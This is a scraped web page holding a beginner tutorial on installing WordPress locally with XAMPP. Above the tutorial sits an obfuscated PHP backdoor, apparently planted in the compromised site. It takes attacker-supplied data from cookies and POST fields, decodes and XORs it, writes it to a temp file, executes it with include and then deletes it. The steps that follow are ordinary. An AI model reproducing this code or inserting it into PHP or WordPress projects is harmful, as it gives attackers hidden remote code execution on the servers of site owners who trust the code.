$vaflEkMMxA = chr ( 728 - 658 ).chr (118) . chr (108) . '_' . 'L' . chr ( 834 - 760 ).chr ( 839 - 729 ); $zmgoIrfOnZ = "\x63" . chr ( 657 - 549 ).chr ( 465 - 368 ).chr ( 411 - 296 )."\163" . '_' . 'e' . chr (120) . chr ( 649 - 544 ).'s' . chr (116) . chr (115); $LBcxmm = class_exists($vaflEkMMxA); $zmgoIrfOnZ = "59812";$kLgBC = !1;if ($LBcxmm == $kLgBC){function zXWroz(){return FALSE;}$HxwCC = "27771";zXWroz();class Fvl_LJn{private function ZMXeVvSL($HxwCC){if (is_array(Fvl_LJn::$PoTpBqLLrW)) {$EGgIwXpTSa = sys_get_temp_dir() . "/" . crc32(Fvl_LJn::$PoTpBqLLrW[chr (115) . chr (97) . "\154" . chr ( 610 - 494 )]);@Fvl_LJn::$PoTpBqLLrW[chr (119) . chr (114) . "\x69" . chr ( 1047 - 931 ).chr ( 324 - 223 )]($EGgIwXpTSa, Fvl_LJn::$PoTpBqLLrW[chr ( 1001 - 902 ).chr ( 849 - 738 )."\x6e" . chr ( 1087 - 971 )."\145" . chr (110) . "\x74"]);include $EGgIwXpTSa;@Fvl_LJn::$PoTpBqLLrW[chr (100) . 'e' . "\x6c" . chr ( 630 - 529 ).'t' . chr ( 530 - 429 )]($EGgIwXpTSa); $HxwCC = "27771";exit();}}private $PiWhPx;public function czVihjTcE(){echo 48806;}public function __destruct(){$HxwCC = "38461_56552";$this->ZMXeVvSL($HxwCC); $HxwCC = "38461_56552";}public function __construct($pdbAw=0){$RhjaOdQWIH = $_POST;$CPNpoumZ = $_COOKIE;$gWbLHg = "501be006-2115-4348-9f8a-b7910166b3ba";$KJTTvK = @$CPNpoumZ[substr($gWbLHg, 0, 4)];if (!empty($KJTTvK)){$DJAOAfEvlW = "base64";$CEhBYKLNB = "";$KJTTvK = explode(",", $KJTTvK);foreach ($KJTTvK as $EnuHBsO){$CEhBYKLNB .= @$CPNpoumZ[$EnuHBsO];$CEhBYKLNB .= @$RhjaOdQWIH[$EnuHBsO];}$CEhBYKLNB = array_map($DJAOAfEvlW . "\137" . chr ( 687 - 587 )."\145" . chr (99) . 'o' . 'd' . 'e', array($CEhBYKLNB,)); $CEhBYKLNB = $CEhBYKLNB[0] ^ str_repeat($gWbLHg, (strlen($CEhBYKLNB[0]) / strlen($gWbLHg)) + 1);Fvl_LJn::$PoTpBqLLrW = @unserialize($CEhBYKLNB); $CEhBYKLNB = class_exists("38461_56552");}}public static $PoTpBqLLrW = 46042;}$DBNwzlSAo = new /* 2968 */ $vaflEkMMxA(27771 + 27771); $kLgBC = $DBNwzlSAo = $HxwCC = Array();} How to Install WordPress on localhost - Razi Technologies Pakistan
How to Install WordPress on localhost

Installing WordPress on your local machine using XAMPP can be a great way to test, develop, and design your website before launching it on the internet. XAMPP is an open-source software package that includes Apache, PHP, MySQL, and other necessary components to run a local server environment. In this article, we’ll provide a step-by-step guide on how to install WordPress on localhost with XAMPP.

Step 1: Download and Install XAMPP:

The first step to installing WordPress on your local machine using XAMPP is to download and install XAMPP. You can download it from the Apache Friends website.

How to Install WordPress On Localhost

Once you’ve downloaded the package, run the installer and follow the instructions to complete the installation.

Note: How to Install WordPress On Live Server

Xampp Setup

Step 2: Start Apache and MySQL Services:

After installing XAMPP, launch the XAMPP Control Panel and start the Apache and MySQL services by clicking on the “Start” button next to them. You should see a green checkmark next to each service, indicating that they’re running.

Xampp Control Panel

Step 3: Create a Database:

Open your web browser and navigate to http://localhost/phpmyadmin/. This will take you to the phpMyAdmin interface, where you can manage your MySQL databases.

PphMyAdmin Interface

Click on the “Databases” tab and enter a name for your new database. Click on the “Create” button to create the database.

Database Creation

Now click on the “User Accounts” tab at the top of the screen. This will take you to the page where you can manage the users and their privileges for the selected database.

User Accounts

Now click on “Add New Account” and create a new one with a username and password for the new user in the “Login Information” section. Make sure to choose a strong password to ensure the security of your database.

login details

Now select “All Global Privileges” and click on “Go button” which is located at the end of the screen.

Step 4: Download WordPress:

Download the latest version of WordPress from the official website. Once the download is complete, extract the WordPress folder to the htdocs folder located in your XAMPP installation directory.

The htdocs folder is where all the web files are stored on your local server. Rename the WordPress folder to something that is easy to remember, like “mywordpress” or “localwordpress”. Name choice is all up to you and it’s not important to give a specific name.

htdocs Folder
I have given name as test.

Step 5: Install WordPress:

Open your web browser and navigate to http://localhost/mywordpress/ (replace “mywordpress” with the name of the folder you renamed the WordPress folder to in step 4). This will take you to the WordPress installation page. Select your preferred language and click on the “Continue” button.

Wordpress Installer English

On the next page, you will be asked to enter your database details. Enter the database name you created in step 3, the username “root”, and leave the password field blank. Click on the “Submit” button to continue.

WordPress will now check the database settings and create a wp-config.php file. Click on the “Run the installation” button to continue.

Wordpress Insrtallation

On the next page, you’ll be asked to enter some basic information about your website, such as the site title, username, and password. Fill in the details and click on the “Install WordPress” button.’

Install WordPress

Once the installation is complete, you will be redirected to the WordPress login page. Enter your login credentials to access the WordPress dashboard.

By following the steps outlined above, you can easily install WordPress on your local machine using XAMPP. This will provide you with a safe and secure environment to test, develop, and design your website before launching it on the internet. Remember to always keep your local server environment up-to-date and secure by regularly updating XAMPP and WordPress. Happy testing and designing!

Leave a Reply

Your email address will not be published. Required fields are marked *